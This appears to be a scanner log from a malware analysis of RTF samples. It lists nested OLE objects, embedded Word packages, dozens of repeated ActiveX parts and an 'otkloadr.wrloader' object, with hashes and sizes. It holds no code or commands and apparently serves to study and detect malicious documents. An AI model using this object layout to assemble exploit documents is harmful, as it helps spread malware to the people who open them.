-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX32.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX33.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX34.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX35.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX36.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX37.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX38.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX39.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX4.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",502,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX40.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",470,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX5.xml")
-ScanObject("ARCHIVE_FS" (1:"OLE2",2095616,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX52.bin")
-ScanObject("OLE2_FS" (0:"UNKNOWN",106,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX52.bin|Root ntry/Contents")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX6.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX7.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX8.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX9.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX1.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX10.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX11.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX12.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX13.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX14.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX15.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX16.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX17.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX18.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX19.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX2.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX20.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX21.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX22.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX23.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX24.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX25.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX26.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX27.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX28.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX29.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX3.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX30.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX31.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX32.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX33.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX34.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX35.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX36.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX37.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX38.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX39.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX4.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",396,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX40.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX5.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX6.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX7.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX8.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX9.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",14898,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/document.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",1297,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/fontTable.xml")
-ScanObject("ARCHIVE_FS" (0:"UNKNOWN",664,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/media/image1.wmf")
-ScanObject("ARCHIVE_FS" (5:"XML",1846,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/settings.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",17304,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/styles.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",6992,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/theme/theme1.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",304,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/webSettings.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",6537,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/_rels/document.xml.rels")
-CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
-ScanObject("ARCHIVE_FS" (5:"XML",590,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|_rels/.rels")
-ScanObject("OLE2_FS" (0:"UNKNOWN",6,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/.ObjInfo")
-ScanObject("GENERIC_FS" (0:"UNKNOWN",14,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|object_3")
-ScanObject("GENERIC_FS" (32:"OLEOBJ",70,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_4")
-ScanObject("MEM_FS" (31:"HEX",1,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_4|RTFOLEOBJECT|otkloadr.wrloader.1")
-ScanObject("MEM_FS" (0:"UNKNOWN",0,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_4|RTFOLEOBJECT|otkloadr.wrloader.1|HEX")
-ScanObject("GENERIC_FS" (1:"OLE2",518,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_5")
-ScanObject("GENERIC_FS" (21:"TEXT",48,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objclass_6")
-ScanObject("GENERIC_FS" (21:"TEXT",22,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|generator_7")
-ScanObject("GENERIC_FS" (0:"UNKNOWN",60,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|falt_8")
-ScanObject("GENERIC_FS" (31:"HEX",420,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|panose_9")
-ScanObject("MEM_FS" (0:"UNKNOWN",210,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|panose_9|HEX")
-ScanObject("GENERIC_FS" (21:"TEXT",175,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|fonttbl_10")
Full example of Sample 2
-ScanObject("GENERIC_FS" (10:"RTF",560752,"d9fac68b6c49c485675d9141f375799d10572999")
-ScanObject("GENERIC_FS" (32:"OLEOBJ",14385,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0")
-ScanObject("MEM_FS" (1:"OLE2",14336,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12")
-ScanObject("OLE2_FS" (0:"UNKNOWN",114,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/.CompObj")
-ScanObject("OLE2_FS" (7:"ZIP",11304,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package")
-ScanObject("ARCHIVE_FS" (5:"XML",709,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/app.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",751,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/core.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",833,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/document.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",1124,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/endnotes.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",1322,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/fontTable.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",1130,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/footnotes.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",1806,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/settings.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",15937,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/styles.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",6993,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/theme/theme1.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",260,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/webSettings.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",1081,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/_rels/document.xml.rels")
-CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
-ScanObject("ARCHIVE_FS" (5:"XML",590,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|_rels/.rels")
-ScanObject("OLE2_FS" (0:"UNKNOWN",6,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/.ObjInfo")
-ScanObject("GENERIC_FS" (32:"OLEOBJ",53297,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1")
-ScanObject("MEM_FS" (1:"OLE2",53248,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12")
-ScanObject("OLE2_FS" (0:"UNKNOWN",114,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/.CompObj")
-ScanObject("OLE2_FS" (7:"ZIP",50517,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package")
-ScanObject("ARCHIVE_FS" (5:"XML",717,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/app.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",751,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/core.xml")
-ScanObject("ARCHIVE_FS" (1:"OLE2",2099200,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX1.bin")
-ScanObject("OLE2_FS" (0:"UNKNOWN",0,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX1.bin|Root Entry/")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX1.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX10.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX11.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX12.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX13.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX14.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX15.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX16.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX17.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX18.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX19.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX2.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX20.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX21.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX22.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX23.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX24.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX25.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX26.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX27.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX28.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX29.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX3.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX30.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX31.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX32.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX33.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX34.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX35.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX36.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX37.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX38.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX39.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX4.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX40.xml")
